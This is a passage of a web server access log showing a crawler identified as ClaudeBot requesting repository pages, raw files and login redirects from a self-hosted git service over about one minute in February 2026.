192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fservices%2FgeminiService.ts" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2FProperties%2FlaunchSettings.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx%2Fproxy_host" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 84853] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fapp%2Fmodels.py" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fdata%2Fkeys.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 11171] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx%2Fproxy_host%2F1.conf" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 11167] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 11165] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fcomponents%2FServices.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9790] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Ffind%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 9786] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 842] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js?display=rendered" [Client 216.73.216.188] [Length 11160] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10902] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fobj%2Fproject.assets.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:00 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11903] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log?display=source" [Client 216.73.216.188] [Length 14516] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 10827] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 216.73.216.188] [Length 9853] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js?display=source" [Client 216.73.216.188] [Length 14922] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11629] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 16175] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Footer.tsx" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Hero.tsx" -[15/Feb/2026:13:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 216.73.216.188] [Length 11087] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 216.73.216.188] [Length 19566] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" [Client 216.73.216.188] [Length 12816] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 216.73.216.188] [Length 12948] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 20542] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" [Client 216.73.216.188] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr 